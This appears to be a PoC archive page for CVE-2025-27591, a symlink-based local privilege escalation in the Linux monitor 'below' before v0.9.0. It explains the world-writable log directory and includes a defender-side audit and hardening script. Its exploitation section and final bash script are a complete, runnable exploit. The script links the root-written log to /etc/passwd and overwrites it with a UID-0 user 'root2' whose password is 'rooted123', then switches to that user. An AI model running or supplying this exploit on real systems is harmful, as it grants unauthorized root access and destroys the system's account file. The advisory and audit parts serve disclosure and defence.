Related vulnerability
Title:
below security vulnerability
(CVE-2025-27591)
Description: below is a resource monitor for modern Linux systems open-sourced by Meta Incubator. Versions of below before v0.9.0 contain a security vulnerability: the program creates a world-writable directory, which can allow privilege escalation to root through a symlink attack.
Description
Local Privilege Escalation via `below` (CVE-2025-27591) - PoC Exploit
Introduction
# CVE-2025-27591 – Privilege Escalation in Below
## 1) Introduction
[Below](https://github.com/facebookincubator/below) is a Linux tool for recording and displaying system data such as hardware utilization and cgroup metrics.
In versions prior to **v0.9.0**, Below’s systemd service runs with `root` privileges and creates world-writable log directories and files under `/var/log/below`. This insecure configuration enables **symlink attacks** that allow an unprivileged local user to escalate privileges to `root`.
This issue was assigned **CVE-2025-27591**.
Upstream fixed it in **v0.9.0**.
---
## 2) Vulnerability – Symlink Attack in `/var/log/below`
- Below ensures `/var/log/below` has **0777** permissions at runtime.
- It also creates `/var/log/below/error_root.log` with **0666** permissions.
- Because the directory is world-writable, an attacker can **replace the log file with a symlink** to any sensitive file (e.g., `/etc/passwd`).
- When Below writes logs as root, it will instead write to the symlink target, allowing privilege escalation.
This behavior sidesteps the kernel's `protected_symlinks` hardening: that sysctl only refuses to follow symlinks in world-writable directories that carry the sticky bit, and `/var/log/below` is created world-writable without it.
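The three conditions above (a world-writable log directory without the sticky bit, a world-writable log file, and a log file that has been swapped for a symlink) are easy to check for on a host. The following audit script is an added example written for this page, not code from the below project or from the PoC author. It takes the directory and file names from the advisory (`/var/log/below`, `error_root.log`); `audit_below_dir` and `harden_below_dir` are names chosen here, and the `demo` function builds the vulnerable layout in a scratch directory so the script can be run without touching the real path. The hardened permissions (0755 directory, 0644 file) are an assumption about what a safe layout looks like, not a quote of the upstream fix.

```shell
#!/bin/sh
# Added defender-side audit for the CVE-2025-27591 layout:
# a world-writable log directory without the sticky bit, a world-writable
# error_root.log, or a log file that has been replaced by a symlink.
# Directory and file names come from the advisory; the demo() directory is
# constructed here so the script runs offline without touching /var/log/below.

# audit_below_dir DIR: print one finding per line.
# Returns 0 when nothing insecure was found, 1 otherwise.
audit_below_dir() {
    dir="$1"
    log="$dir/error_root.log"
    findings=0

    if [ ! -d "$dir" ]; then
        echo "[-] $dir does not exist, nothing to audit"
        return 0
    fi

    # Directory writable by others (o+w). fs.protected_symlinks only guards
    # sticky directories, so o+w without the sticky bit is the dangerous case.
    if [ -n "$(find "$dir" -maxdepth 0 -perm -0002 -print)" ]; then
        if [ -n "$(find "$dir" -maxdepth 0 -perm -1000 -print)" ]; then
            echo "[!] $dir is world-writable (sticky bit set)"
        else
            echo "[!] $dir is world-writable and has no sticky bit"
        fi
        findings=$((findings + 1))
    fi

    # A symlink here means root's log writes would land on the link target.
    if [ -L "$log" ]; then
        echo "[!] $log is a symlink to $(readlink "$log")"
        findings=$((findings + 1))
    elif [ -f "$log" ] && [ -n "$(find "$log" -maxdepth 0 -perm -0002 -print)" ]; then
        echo "[!] $log is world-writable"
        findings=$((findings + 1))
    fi

    [ "$findings" -eq 0 ]
}

# harden_below_dir DIR: apply safe permissions (0755 directory, 0644 regular
# log file) and replace a symlinked log with an empty regular file.
harden_below_dir() {
    dir="$1"
    log="$dir/error_root.log"
    [ -d "$dir" ] || return 0
    chmod 0755 "$dir"
    if [ -L "$log" ]; then
        rm -f "$log"
        : > "$log"
    fi
    [ -f "$log" ] && chmod 0644 "$log"
    return 0
}

# demo: build the vulnerable layout in a scratch directory (constructed
# sample, not the real /var/log/below), audit it, fix it, audit again.
demo() {
    scratch=$(mktemp -d)
    mkdir -m 0777 "$scratch/below"
    : > "$scratch/below/error_root.log"
    chmod 0666 "$scratch/below/error_root.log"

    echo "== before hardening =="
    if audit_below_dir "$scratch/below"; then echo "clean"; else echo "insecure"; fi
    harden_below_dir "$scratch/below"
    echo "== after hardening =="
    if audit_below_dir "$scratch/below"; then echo "clean"; else echo "insecure"; fi

    rm -rf "$scratch"
}

demo
```

To check a real host, call `audit_below_dir /var/log/below` as root; a non-zero exit or any `[!]` line means the directory still has the pre-0.9.0 layout, and the lasting fix is to upgrade below to v0.9.0 or later rather than to rely on the chmod alone, since the vulnerable service re-applies 0777 at runtime.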
---
## 3) Exploitation
By pointing `error_root.log` to `/etc/passwd`, we can inject a new root user with a known password.
### Steps
Step 1: Create backup of `/etc/passwd`.
Always back up before modifying system files:
```bash
cp /etc/passwd /tmp/passwd.bak
```
Step 2: Generate a malicious user entry
```bash
HASH=$(openssl passwd -6 'rooted123')
echo "root2:$HASH:0:0:root:/root:/bin/bash" > /tmp/payload
```
Step 3: Symlink the vulnerable log
```bash
rm -f /var/log/below/error_root.log
ln -s /etc/passwd /var/log/below/error_root.log
```
Step 4: Trigger log creation
```bash
sudo /usr/bin/below replay --time "invalid" >/dev/null 2>&1
```
Step 5: Overwrite `/etc/passwd`
```bash
cat /tmp/payload > /var/log/below/error_root.log
```
Step 6: Switch to the new root user
```bash
su root2
# password: rooted123
```
---
## 4) Proof of Concept (PoC): Run this script
```bash
#!/bin/bash
# CVE-2025-27591 Exploit - Privilege Escalation via 'below'
TARGET="/etc/passwd"
LINK_PATH="/var/log/below/error_root.log"
TMP_PAYLOAD="/tmp/payload"
BACKUP="/tmp/passwd.bak"
echo "[*] CVE-2025-27591 Privilege Escalation Exploit"
# Check for sudo access to below
echo "[*] Checking sudo permissions..."
if ! sudo -l | grep -q '/usr/bin/below'; then
echo "[!] 'below' is not available via sudo. Exiting."
exit 1
fi
# Backup current /etc/passwd
echo "[*] Backing up /etc/passwd to $BACKUP"
cp /etc/passwd "$BACKUP"
# Generate password hash for 'root2' user (password: rooted123)
echo "[*] Generating password hash..."
HASH=$(openssl passwd -6 'rooted123')
# Prepare malicious passwd line
echo "[*] Creating malicious passwd line..."
echo "root2:$HASH:0:0:root:/root:/bin/bash" > "$TMP_PAYLOAD"
# Create symlink
echo "[*] Linking $LINK_PATH to $TARGET"
rm -f "$LINK_PATH"
ln -sf "$TARGET" "$LINK_PATH"
# Trigger log creation with invalid --time to force below to recreate the log
echo "[*] Triggering 'below' to write to symlinked log..."
sudo /usr/bin/below replay --time "invalid" >/dev/null 2>&1
# Overwrite passwd file via symlink
echo "[*] Injecting malicious user into /etc/passwd"
cat "$TMP_PAYLOAD" > "$LINK_PATH"
# Test access
echo "[*] Try switching to 'root2' using password: rooted123"
su root2
```
![CVE-2025-27591](https://github.com/user-attachments/assets/b01a5ea4-1b0e-4986-81c5-dabe06e4e148)
File snapshot
[4.0K] /data/pocs/0c5cfae4320ffa514b9ed20cec0818ffbb2692e1
├── [1.3K] CVE-2025-27591.sh
└── [3.5K] README.md
0 directories, 2 files
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source is no longer available or cannot be reached, send an e-mail to f.jinxu#gmail.com (replace # with @) to request the local snapshot.
3. 神龙 has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.